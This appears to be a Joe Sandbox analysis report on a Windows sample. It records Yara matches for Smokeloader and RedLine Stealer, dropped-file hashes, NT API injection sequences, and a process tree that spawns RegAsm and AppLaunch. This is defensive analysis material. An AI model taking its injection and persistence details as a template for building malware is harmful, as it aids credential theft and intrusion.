                  Source: Yara matchFile source: 00000000.00000002.899739765.0000000002421000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00430EEA CreateDCW,GetSystemMetrics,CreateCompatibleBitmap,CreateCompatibleDC,SelectObject,SelectObject,BitBlt,SelectObject,DeleteDC,DeleteObject,11_2_00430EEA
                  Source: file.exe, 00000000.00000002.899762374.0000000002578000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>memstr_0dd8237f-c

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 10.0.46A3.exe.330000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables packed with unregistered version of .NET Reactor Author: ditekSHen
                  Source: 00000007.00000002.951709724.0000000002431000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: 00000007.00000002.951734565.0000000002516000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000007.00000002.951699501.0000000002400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: 00000000.00000002.899710325.0000000002400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: 00000000.00000002.899739765.0000000002421000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: 00000000.00000002.899774511.0000000002587000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000000.00000002.899704106.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000007.00000002.951696047.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exe, type: DROPPEDMatched rule: Detects executables packed with unregistered version of .NET Reactor Author: ditekSHen
                  Source: C:\Users\user\AppData\Local\Temp\BB04.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6612 -s 152
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040B84D0_2_0040B84D
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040FA500_2_0040FA50
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004104F20_2_004104F2
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004119060_2_00411906
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040FFA10_2_0040FFA1
                  Source: C:\Users\user\AppData\Roaming\wfshtitCode function: 7_2_0040B84D7_2_0040B84D
                  Source: C:\Users\user\AppData\Roaming\wfshtitCode function: 7_2_0040FA507_2_0040FA50
                  Source: C:\Users\user\AppData\Roaming\wfshtitCode function: 7_2_004104F27_2_004104F2
                  Source: C:\Users\user\AppData\Roaming\wfshtitCode function: 7_2_004119067_2_00411906
                  Source: C:\Users\user\AppData\Roaming\wfshtitCode function: 7_2_0040FFA17_2_0040FFA1
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeCode function: 10_2_6F04B6B010_2_6F04B6B0
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeCode function: 10_2_6F074EE010_2_6F074EE0
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeCode function: 10_2_6F042D7010_2_6F042D70
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeCode function: 10_2_6F09AC2910_2_6F09AC29
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeCode function: 10_2_6F028B3010_2_6F028B30
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeCode function: 10_2_6F090B8910_2_6F090B89
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeCode function: 10_2_6F064AC010_2_6F064AC0
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeCode function: 10_2_6F06497010_2_6F064970
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeCode function: 10_2_6F02C7B010_2_6F02C7B0
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeCode function: 10_2_6F02A7E010_2_6F02A7E0
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeCode function: 10_2_6F02665010_2_6F026650
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeCode function: 10_2_6F09A54D10_2_6F09A54D
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeCode function: 10_2_6F06455010_2_6F064550
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeCode function: 10_2_6F08231010_2_6F082310
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeCode function: 10_2_6F0763B010_2_6F0763B0
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeCode function: 10_2_6F03A0C010_2_6F03A0C0
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeCode function: 10_2_6F099FFC10_2_6F099FFC
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeCode function: 10_2_6F09BFF110_2_6F09BFF1
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeCode function: 10_2_6F063E5010_2_6F063E50
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeCode function: 10_2_6F075EB910_2_6F075EB9
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeCode function: 10_2_6F075DD010_2_6F075DD0
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeCode function: 10_2_6F095DD210_2_6F095DD2
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeCode function: 10_2_6F063C9010_2_6F063C90
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeCode function: 10_2_6F081CA010_2_6F081CA0
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeCode function: 10_2_6F099AAB10_2_6F099AAB
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeCode function: 10_2_6F09B96410_2_6F09B964
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeCode function: 10_2_6F07583010_2_6F075830
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeCode function: 10_2_6F0758D710_2_6F0758D7
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeCode function: 10_2_6F0758D510_2_6F0758D5
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeCode function: 10_2_6F06346010_2_6F063460
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeCode function: 10_2_6F06326010_2_6F063260
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeCode function: 10_2_6F07527410_2_6F075274
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeCode function: 10_2_6F07505010_2_6F075050
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeCode function: 10_2_0113859E10_2_0113859E
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeCode function: 10_2_0113390810_2_01133908
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeCode function: 10_2_0113930810_2_01139308
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeCode function: 10_2_0113423810_2_01134238
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeCode function: 10_2_011338F910_2_011338F9
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeCode function: 10_2_0594284010_2_05942840
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeCode function: 10_2_05940EB310_2_05940EB3
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeCode function: 10_2_0594093010_2_05940930
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeCode function: 10_2_0594282010_2_05942820
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040A87811_2_0040A878
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004090F811_2_004090F8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004118B611_2_004118B6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0043213011_2_00432130
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00421AC811_2_00421AC8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040EB6B11_2_0040EB6B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0042FB7811_2_0042FB78
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0043330011_2_00433300
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00402BFC11_2_00402BFC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040E56811_2_0040E568
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0042353E11_2_0042353E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040D60C11_2_0040D60C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041DE1F11_2_0041DE1F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00438ECD11_2_00438ECD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0042475011_2_00424750
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00405F8811_2_00405F88
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041600511_2_00416005
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004138E411_2_004138E4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004180FC11_2_004180FC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004388FE11_2_004388FE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004110B811_2_004110B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0044514F11_2_0044514F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0042293A11_2_0042293A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004539C411_2_004539C4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041599911_2_00415999
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040C1B211_2_0040C1B2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0043F27011_2_0043F270
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0043BA1511_2_0043BA15
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00442A3411_2_00442A34
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0045AACE11_2_0045AACE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004142CE11_2_004142CE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041429711_2_00414297
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00416AB911_2_00416AB9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0042EB6111_2_0042EB61
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0045CB7011_2_0045CB70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004193A511_2_004193A5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00418BB311_2_00418BB3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00419C2111_2_00419C21
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00420CCC11_2_00420CCC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0044D4D011_2_0044D4D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041AD7111_2_0041AD71
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00445D1311_2_00445D13
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040B52811_2_0040B528
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00461E5811_2_00461E58
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0044DE2B11_2_0044DE2B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041FE3211_2_0041FE32
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004436F411_2_004436F4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0043C73711_2_0043C737
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0042DFE811_2_0042DFE8
                  Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 49%
                  Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: mfsrcsnk.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\46A3.exe C5DC9C7BA82D0573EAD80F7174706AD1A5432616CE5602D1EC7F778F910136B7
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\BB04.exe 433066AFD2579211323F9FE6AC6945B354B5422CAF932DABE4F9101BF6C71AD3
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\Protect544cd51a.dll DFCE2D4D06DE6452998B3C5B2DC33EAA6DB2BD37810D04E3D02DC931887CFDDD
                  Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 10.0.46A3.exe.330000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_EXE_Packed_DotNetReactor author = ditekSHen, description = Detects executables packed with unregistered version of .NET Reactor
                  Source: 00000007.00000002.951709724.0000000002431000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: 00000007.00000002.951734565.0000000002516000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000007.00000002.951699501.0000000002400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: 00000000.00000002.899710325.0000000002400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: 00000000.00000002.899739765.0000000002421000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: 00000000.00000002.899774511.0000000002587000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000000.00000002.899704106.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000007.00000002.951696047.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exe, type: DROPPEDMatched rule: INDICATOR_EXE_Packed_DotNetReactor author = ditekSHen, description = Detects executables packed with unregistered version of .NET Reactor
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeCode function: String function: 6F0890D8 appears 51 times
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeCode function: String function: 6F08D520 appears 31 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0043EB30 appears 51 times
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004012AB NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004012AB
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401501 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401501
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401406 NtAllocateVirtualMemory,0_2_00401406
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401413 NtAllocateVirtualMemory,0_2_00401413
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401528 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401528
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040153C NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_0040153C
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004026CB NtClose,0_2_004026CB
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004014D8 NtAllocateVirtualMemory,0_2_004014D8
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004012DC NtAllocateVirtualMemory,0_2_004012DC
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004012EC NtAllocateVirtualMemory,0_2_004012EC
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004014F4 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004014F4
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004013FB NtAllocateVirtualMemory,0_2_004013FB
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402698 NtClose,0_2_00402698
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004012AA NtAllocateVirtualMemory,0_2_004012AA
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004012B4 NtAllocateVirtualMemory,0_2_004012B4
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004013BA NtAllocateVirtualMemory,0_2_004013BA
                  Source: C:\Users\user\AppData\Roaming\wfshtitCode function: 7_2_004012AB NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_004012AB
                  Source: C:\Users\user\AppData\Roaming\wfshtitCode function: 7_2_00401501 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_00401501
                  Source: C:\Users\user\AppData\Roaming\wfshtitCode function: 7_2_00401406 NtAllocateVirtualMemory,7_2_00401406
                  Source: C:\Users\user\AppData\Roaming\wfshtitCode function: 7_2_00401413 NtAllocateVirtualMemory,7_2_00401413
                  Source: C:\Users\user\AppData\Roaming\wfshtitCode function: 7_2_00401528 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_00401528
                  Source: C:\Users\user\AppData\Roaming\wfshtitCode function: 7_2_0040153C NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_0040153C
                  Source: C:\Users\user\AppData\Roaming\wfshtitCode function: 7_2_004026CB NtClose,7_2_004026CB
                  Source: C:\Users\user\AppData\Roaming\wfshtitCode function: 7_2_004014D8 NtAllocateVirtualMemory,7_2_004014D8
                  Source: C:\Users\user\AppData\Roaming\wfshtitCode function: 7_2_004012DC NtAllocateVirtualMemory,7_2_004012DC
                  Source: C:\Users\user\AppData\Roaming\wfshtitCode function: 7_2_004012EC NtAllocateVirtualMemory,7_2_004012EC
                  Source: C:\Users\user\AppData\Roaming\wfshtitCode function: 7_2_004014F4 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_004014F4
                  Source: C:\Users\user\AppData\Roaming\wfshtitCode function: 7_2_004013FB NtAllocateVirtualMemory,7_2_004013FB
                  Source: C:\Users\user\AppData\Roaming\wfshtitCode function: 7_2_00402698 NtClose,7_2_00402698
                  Source: C:\Users\user\AppData\Roaming\wfshtitCode function: 7_2_004012AA NtAllocateVirtualMemory,7_2_004012AA
                  Source: C:\Users\user\AppData\Roaming\wfshtitCode function: 7_2_004012B4 NtAllocateVirtualMemory,7_2_004012B4
                  Source: C:\Users\user\AppData\Roaming\wfshtitCode function: 7_2_004013BA NtAllocateVirtualMemory,7_2_004013BA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040EB6B lstrcmpW,NtCreateFile,lstrlenW,lstrcatW,lstrcmpW,NtQueryDirectoryFile,lstrlenW,lstrcatW,lstrcmpW,lstrcmpW,lstrcmpW,lstrlenW,lstrcatW,lstrlenW,lstrcatW,lstrcatW,lstrcatW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,11_2_0040EB6B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040E568 NtReadFile,11_2_0040E568
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040D60C lstrcatW,lstrcatW,lstrcatW,lstrlenW,NtCreateFile,lstrlenW,11_2_0040D60C
                  Source: file.exe, 00000000.00000000.885803846.0000000002284000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameBujingle.exe. vs file.exe
                  Source: file.exeBinary or memory string: OriginalFilenameBujingle.exe. vs file.exe
                  Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\wfshtitJump to behavior
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@12/11@112/14
                  Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
                  Source: file.exeReversingLabs: Detection: 34%
                  Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\wfshtit C:\Users\user\AppData\Roaming\wfshtit
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\46A3.exe C:\Users\user\AppData\Local\Temp\46A3.exe
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\BB04.exe C:\Users\user\AppData\Local\Temp\BB04.exe
                  Source: C:\Users\user\AppData\Local\Temp\BB04.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Local\Temp\BB04.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                  Source: C:\Users\user\AppData\Local\Temp\BB04.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6612 -s 152
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\46A3.exe C:\Users\user\AppData\Local\Temp\46A3.exeJump to behavior
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\BB04.exe C:\Users\user\AppData\Local\Temp\BB04.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\BB04.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeJump to behavior
                  Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11659a23-5884-4d1b-9cf6-67d6f4f90b36}\InProcServer32Jump to behavior
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\46A3.tmpJump to behavior
